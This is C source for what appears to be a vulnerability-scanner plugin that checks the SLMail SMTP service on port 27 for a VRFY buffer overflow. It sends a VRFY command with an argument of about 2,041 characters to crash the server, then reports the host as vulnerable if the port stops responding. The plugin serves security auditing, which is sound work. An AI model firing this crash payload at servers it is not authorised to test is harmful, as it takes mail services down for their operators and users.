/*
 * 
 * slmail
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>
#define NAME "slmail:27 VRFY overflow"
#define DESC "\
The SLMail service listens on several ports,\n\
one of which is 27 which provided SMTP services\n\
in addition to port 25. \n\
On this port, issuing an VRFY command with an \n\
argument longer than 855 chars will make the\n\
remote server crash\n\
Risk factor : High"
#define COPYRIGHT "no copyright"
#define SUMM "buffer overflow for the SLMail SMTP server"

PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}


PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
	char * buffer, * crap;
	int sock;
	
	if(host_get_port_state(args, 27)<=0)return(0);
	sock = open_sock_tcp(args, 27);
	if(sock<=0)return(0);
	buffer = (char *)emalloc(5000);
        crap = emalloc(4097);
        memset(crap, 'x', 2041);
  	sprintf(buffer, "VRFY %s\r\n", crap);
  	efree(&crap);
  	send(sock, &buffer[0], strlen(buffer),0);
  	socket_close(sock);
  	efree(&buffer);
  	
  	sock = open_sock_tcp(args, 27);
  	if(sock<0)
  	{
  	post_hole(args, 27, 
"Performed a denial of service against the remote SMTP server\n\
which may be SLMail (not checked though) by issuing a too long\n\
argument to the VRFY command\n\
Solution: Upgrade");
  	}
  	else socket_close(sock);
	return(0);
}

